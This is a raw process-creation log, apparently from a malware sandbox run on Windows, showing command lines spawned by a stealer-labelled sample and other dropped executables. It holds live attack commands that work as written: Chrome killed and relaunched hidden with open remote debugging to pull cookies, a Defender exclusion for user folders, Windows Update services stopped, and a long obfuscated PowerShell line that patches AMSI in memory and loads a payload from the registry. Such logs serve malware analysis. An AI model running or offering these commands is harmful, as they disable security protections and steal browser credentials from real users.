C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\stealc_valenciga.exe

"C:\Users\Admin\Desktop\Files\stealc_valenciga.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7968 -ip 7968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1300

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 12680 -s 1372

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x128,0x12c,0x130,0xf4,0x134,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\injector.exe

"C:\Users\Admin\Desktop\Files\injector.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

\??\c:\users\admin\desktop\files\injector.exe 

c:\users\admin\desktop\files\injector.exe 

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4936 -ip 4936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1292

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\ldqj18tn.exe

"C:\Users\Admin\Desktop\Files\ldqj18tn.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\Desktop\Files\china.exe

"C:\Users\Admin\Desktop\Files\china.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Users\Admin\Desktop\Files\ew.exe

"C:\Users\Admin\Desktop\Files\ew.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\explorer.exe

explorer.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\Desktop\Files\h5a71wdy.exe

"C:\Users\Admin\Desktop\Files\h5a71wdy.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5292 -ip 5292

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\ProgramData\gnabpgw\wohcj.exe

C:\ProgramData\gnabpgw\wohcj.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rxUZSeucghvE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$tkTJHfFvGhTCzu,[Parameter(Position=1)][Type]$HJxhrzqmwR)$OEMRgOedrCw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+''+[Char](101)+'cte'+[Char](100)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'em'+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+'ul'+[Char](101)+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+''+[Char](112)+'e','C'+[Char](108)+''+[Char](97)+'ss'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+''+','+'S'+[Char](101)+'aled'+[Char](44)+''+'A'+'n'+[Char](115)+'iC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+'C'+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$OEMRgOedrCw.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+'c'+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+'P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$tkTJHfFvGhTCzu).SetImplementationFlags(''+'R'+'u'+[Char](110)+'ti'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'ag'+[Char](101)+''+[Char](100)+'');$OEMRgOedrCw.DefineMethod('In'+'v'+'o'+'k'+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+[Char](105)+'deB'+[Char](121)+'Si'+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+'V'+''+'i'+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$HJxhrzqmwR,$tkTJHfFvGhTCzu).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+'n'+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $OEMRgOedrCw.CreateType();}$lEEpcPeWgbqjE=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+'ll')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+'o'+'so'+[Char](102)+''+'t'+'.'+[Char](87)+''+'i'+''+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+''+[Char](116)+''+'i'+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+'s');$GhnaXaSdbUhylH=$lEEpcPeWgbqjE.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'P'+''+[Char](114)+'o'+[Char](99)+'Ad'+[Char](100)+'r'+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$DIOUIrvOSfgWoJRURYl=rxUZSeucghvE @([String])([IntPtr]);$fVJvxeIMIaAKBIppKiOpBK=rxUZSeucghvE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$InhSEnuVnzP=$lEEpcPeWgbqjE.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'el3'+[Char](50)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ZNZGdYqEptPMOz=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$InhSEnuVnzP,[Object]('L'+'o'+''+'a'+''+[Char](100)+'Li'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$tAyRzHzFGduBivAvn=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$InhSEnuVnzP,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$OEeIiUk=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZNZGdYqEptPMOz,$DIOUIrvOSfgWoJRURYl).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'');$VTLUQUXkcFxmEkjxZ=$GhnaXaSdbUhylH.Invoke($Null,@([Object]$OEeIiUk,[Object](''+'A'+'m'+'s'+'i'+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$iiYEfOiPLZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAyRzHzFGduBivAvn,$fVJvxeIMIaAKBIppKiOpBK).Invoke($VTLUQUXkcFxmEkjxZ,[uint32]8,4,[ref]$iiYEfOiPLZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$VTLUQUXkcFxmEkjxZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($tAyRzHzFGduBivAvn,$fVJvxeIMIaAKBIppKiOpBK).Invoke($VTLUQUXkcFxmEkjxZ,[uint32]8,0x20,[ref]$iiYEfOiPLZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue('d'+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](114)+''+'s'+''+'t'+''+'a'+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58

C:\Users\Admin\AppData\Local\Temp\275919514.exe

C:\Users\Admin\AppData\Local\Temp\275919514.exe

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""

C:\ProgramData\gnabpgw\wohcj.exe

"C:\ProgramData\gnabpgw\wohcj.exe"

C:\Program Files\Google\Chrome\Application\original.exe

"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=

C:\Program Files\Google\Chrome\Application\original.exe

